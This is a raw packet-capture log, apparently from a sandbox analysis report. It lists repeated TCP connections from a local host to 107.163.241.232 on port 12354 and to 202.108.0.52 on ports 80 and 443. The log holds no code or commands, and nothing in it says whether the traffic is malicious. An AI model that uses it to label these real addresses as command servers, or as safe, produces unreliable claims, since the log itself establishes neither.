                                              Dec 11, 2024 16:24:50.725707054 CET4987312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.736990929 CET4987312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.737703085 CET4989512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.858807087 CET1235449873107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:50.859724045 CET1235449895107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:50.859828949 CET4989512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.870852947 CET4989512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.875847101 CET1235449876107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:50.878226995 CET4987612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.951025963 CET4987612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:50.995482922 CET1235449895107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:51.010355949 CET8049883202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:51.012864113 CET4988380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:51.077835083 CET1235449876107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:51.124481916 CET4989612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:51.183582067 CET49898443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:51.183656931 CET44349898202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:51.183720112 CET49898443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:51.244195938 CET1235449896107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:51.244326115 CET4989612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:51.396624088 CET49898443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:51.396657944 CET44349898202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:51.397738934 CET4989612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:51.517070055 CET1235449896107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:52.478622913 CET4989512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.478655100 CET4989612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.478693008 CET49898443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:52.479330063 CET4991012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.591381073 CET4988380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:52.592029095 CET4991280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:52.592322111 CET4991312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.603310108 CET1235449910107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:52.603471041 CET4991012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.603718042 CET4991012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.711076975 CET8049883202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:52.711272001 CET8049912202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:52.711339951 CET4988380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:52.711381912 CET4991280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:52.711555958 CET4991280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:52.711559057 CET1235449913107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:52.711622000 CET4991312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.711688042 CET4991312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:52.723006010 CET1235449910107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:52.831688881 CET8049912202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:52.831712961 CET1235449913107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.279504061 CET8049912202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:54.279618979 CET4991280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:54.393670082 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:54.393748999 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:54.393834114 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:54.394232988 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:54.394258022 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:54.721663952 CET1235449910107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.721811056 CET4991012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.721858025 CET4991012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.722716093 CET4993012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.834841967 CET1235449913107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.834909916 CET4991312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.834991932 CET4991312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.835381031 CET4993212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.841258049 CET1235449910107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.842366934 CET1235449930107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.842463970 CET4993012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.843027115 CET4993012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.954843998 CET1235449913107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.954876900 CET1235449932107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:54.955161095 CET4993212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.955281973 CET4993212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:54.962783098 CET1235449930107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:55.074640036 CET1235449932107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:56.079982042 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.080096006 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.080729961 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.080807924 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.089050055 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.089082003 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.089344978 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.089406967 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.089922905 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.135341883 CET44349927202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.482116938 CET4993212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.482166052 CET49927443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.482224941 CET4993012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.493051052 CET4994712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.593931913 CET4994912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.608846903 CET4995080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.608967066 CET4991280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.785206079 CET1235449947107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:56.785243988 CET1235449949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:56.785254002 CET8049950202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.785264969 CET8049912202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:56.785434961 CET4994712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.785492897 CET4995080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.785505056 CET4994912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.785506964 CET4991280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.846805096 CET4994712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.850697041 CET4994912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:56.850830078 CET4995080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:56.966311932 CET1235449947107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:56.970369101 CET1235449949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:56.970380068 CET8049950202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:58.345418930 CET8049950202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:58.345520020 CET4995080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:58.347487926 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:58.347524881 CET44349963202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:58.347615957 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:58.347809076 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:24:58.347829103 CET44349963202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:24:58.890932083 CET1235449949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:58.891117096 CET1235449947107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:58.891215086 CET4994712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:58.891227961 CET4994912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:58.891303062 CET4994712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:58.891308069 CET4994912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:58.891602039 CET4996912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:58.996788979 CET4997112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:59.010618925 CET1235449947107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:59.010644913 CET1235449949107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:59.010880947 CET1235449969107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:59.011398077 CET4996912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:59.011954069 CET4996912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:59.116518021 CET1235449971107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:59.116621017 CET4997112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:59.116897106 CET4997112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:24:59.131927967 CET1235449969107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:24:59.236488104 CET1235449971107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:00.200763941 CET44349963202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:00.200849056 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.201314926 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.201323032 CET44349963202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:00.203169107 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.203175068 CET44349963202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:00.494437933 CET4997112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.494460106 CET49963443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.494488955 CET4996912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.495331049 CET4998512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.607095003 CET4998712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.607600927 CET4995080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.607806921 CET4998880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.617503881 CET1235449985107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:00.617610931 CET4998512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.617780924 CET4998512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.726550102 CET1235449987107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:00.726663113 CET4998712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.726824045 CET4998712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:00.727066994 CET8049988202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:00.727142096 CET4998880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.727209091 CET8049950202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:00.727241039 CET4998880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.727262974 CET4995080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:00.737224102 CET1235449985107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:00.846174955 CET1235449987107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:00.846555948 CET8049988202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:02.299369097 CET8049988202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:02.299433947 CET4998880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:02.309724092 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:02.309782028 CET44350001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:02.309851885 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:02.310616970 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:02.310633898 CET44350001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:02.735593081 CET1235449985107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.735682964 CET4998512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.735778093 CET4998512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.736356974 CET5000512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.844360113 CET1235449987107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.844422102 CET4998712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.844491959 CET4998712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.855796099 CET1235449985107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.855839968 CET1235450005107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.855906010 CET5000512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.856947899 CET5000512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.858608007 CET5000812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.964876890 CET1235449987107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.977822065 CET1235450005107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.979581118 CET1235450008107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:02.979660988 CET5000812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:02.980178118 CET5000812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:03.106050968 CET1235450008107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:04.011097908 CET44350001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:04.011239052 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.011756897 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.011785984 CET44350001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:04.013465881 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.013479948 CET44350001202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:04.494699001 CET5000812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.494714022 CET5000512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.494718075 CET50001443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.498925924 CET5002412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.608546019 CET4998880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.608793020 CET5002680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.609009981 CET5002712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.621423960 CET1235450024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:04.621583939 CET5002412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.621783972 CET5002412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.733644009 CET8050026202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:04.733719110 CET5002680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.733771086 CET8049988202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:04.733783007 CET1235450027107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:04.733822107 CET4998880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.733844042 CET5002712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.734020948 CET5002680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:04.734268904 CET5002712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:04.745522976 CET1235450024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:04.857991934 CET8050026202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:04.858541012 CET1235450027107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.308722973 CET8050026202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:06.308819056 CET5002680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:06.310959101 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:06.311012983 CET44350042202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:06.311084032 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:06.311336994 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:06.311348915 CET44350042202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:06.735907078 CET1235450024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.736001968 CET5002412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.736095905 CET5002412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.736500978 CET5004612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.842710018 CET1235450027107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.842787981 CET5002712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.842823982 CET5002712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.843147993 CET5004812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.861748934 CET1235450024107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.862045050 CET1235450046107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.862118006 CET5004612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.862236977 CET5004612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.963577032 CET1235450027107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.963639975 CET1235450048107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.963716984 CET5004812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:06.981836081 CET1235450046107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:06.995634079 CET5004812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:07.115798950 CET1235450048107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:08.013787031 CET44350042202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:08.013849974 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.014467955 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.014478922 CET44350042202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:08.016225100 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.016232967 CET44350042202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:08.494548082 CET5004812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.494719982 CET50042443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.494720936 CET5004612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.496407986 CET5006412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.608133078 CET5006612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.608467102 CET5002680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.608714104 CET5006780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.616241932 CET1235450064107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:08.616458893 CET5006412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.616647959 CET5006412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.731403112 CET1235450066107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:08.731513023 CET5006612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.731767893 CET5006612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:08.732055902 CET8050067202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:08.732116938 CET8050026202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:08.732125998 CET5006780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.732170105 CET5002680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.732338905 CET5006780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:08.740134954 CET1235450064107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:08.852368116 CET1235450066107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:08.853388071 CET8050067202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:10.304788113 CET8050067202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:10.304990053 CET5006780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:10.307507038 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:10.307544947 CET44350081202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:10.307621956 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:10.307836056 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:10.307846069 CET44350081202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:10.735220909 CET1235450064107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:10.735318899 CET5006412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.756552935 CET5006412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.757180929 CET5008612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.845766068 CET1235450066107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:10.845891953 CET5006612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.846102953 CET5006612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.872243881 CET5008812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.876408100 CET1235450064107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:10.876601934 CET1235450086107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:10.876679897 CET5008612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.876811981 CET5008612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.965483904 CET1235450066107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:10.991952896 CET1235450088107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:10.992091894 CET5008812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.992366076 CET5008812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:10.996130943 CET1235450086107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:11.111877918 CET1235450088107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:12.010896921 CET44350081202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:12.011075974 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.011590958 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.011620045 CET44350081202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:12.013314962 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.013329029 CET44350081202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:12.509947062 CET5008812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.509968042 CET50081443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.509980917 CET5008612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.510375023 CET5010412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.622422934 CET5010612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.624367952 CET5006780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.624596119 CET5010780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.633250952 CET1235450104107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:12.633368969 CET5010412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.633485079 CET5010412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.742237091 CET1235450106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:12.742382050 CET5010612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.742552996 CET5010612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:12.743987083 CET8050107202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:12.744046926 CET8050067202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:12.744062901 CET5010780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.744112015 CET5006780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.744430065 CET5010780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:12.753675938 CET1235450104107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:12.862580061 CET1235450106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:12.864065886 CET8050107202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:14.316438913 CET8050107202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:14.316534996 CET5010780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:14.318749905 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:14.318808079 CET44350124202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:14.318886995 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:14.319098949 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:14.319117069 CET44350124202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:14.750549078 CET1235450104107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.750649929 CET5010412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.750730991 CET5010412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.751552105 CET5012912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.860366106 CET1235450106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.860487938 CET5010612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.863929987 CET5010612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.870210886 CET1235450104107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.871273994 CET1235450129107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.871365070 CET5012912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.871700048 CET5012912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.871915102 CET5013112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.983771086 CET1235450106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.991174936 CET1235450129107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.991235018 CET1235450131107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:14.991377115 CET5013112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:14.991518974 CET5013112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:15.110898018 CET1235450131107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:25:16.010672092 CET44350124202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:16.010772943 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:16.011259079 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:16.011271000 CET44350124202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:16.012924910 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:16.012939930 CET44350124202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:25:16.525388002 CET50124443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:25:16.525402069 CET5013112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:16.525444031 CET5012912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:25:16.526031017 CET5014712354192.168.2.4107.163.241.232
